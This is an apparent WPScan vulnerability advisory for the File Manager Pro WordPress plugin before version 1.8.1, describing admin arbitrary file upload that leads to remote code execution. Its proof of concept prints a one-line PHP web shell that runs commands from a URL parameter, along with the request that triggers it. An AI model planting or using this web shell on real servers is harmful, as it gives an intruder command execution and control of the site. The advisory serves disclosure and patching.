File Manager Pro < 1.8.1 – Admin+ Remote Code Execution | CVE 2023-4861 | Plugin Vulnerabilities

Description

The plugin allows admin users to upload arbitrary files, even in environments where such a user should not be able to gain full control of the server, such as a multisite installation. This leads to remote code execution.

Proof of Concept

As an admin, use the File Manager UI to upload a file `shell.php` with the following contents:

<?php echo system($_GET['cmd']);

Visit `/shell.php?cmd=id` to trigger RCE.

Affects Plugins

Fixed in 1.8.1

References

CVE

Classification

Type

RCE

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Alex Sanford

Submitter

Alex Sanford

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

7fa03f00-25c7-4e40-8592-bb4001ce019d

Timeline

Publicly Published

2023-09-19 (about 7 months ago)

Added

2023-09-19 (about 7 months ago)

Last Updated

2023-09-19 (about 7 months ago)

Other

Published

Title

Published

2022-05-18

Title

The School Management < 9.9.7 - Unauthenticated RCE via REST api

Published

2023-05-22

Title

Revolution Slider <= 6.6.12 - Author+ Remote Code Execution

Published

2023-09-05

Title

Media Library Assistant < 3.10 - Unauthenticated Local/Remote File Inclusion & Remote Code Execution

Published

2018-05-18

Title

ProfileGrid – User Profiles, Groups and Communities <= 2.8.5 - Authenticated Code Execution

Published

2022-10-14

Title

WP All Import < 3.6.9 - Admin+ Arbitrary File Upload to RCE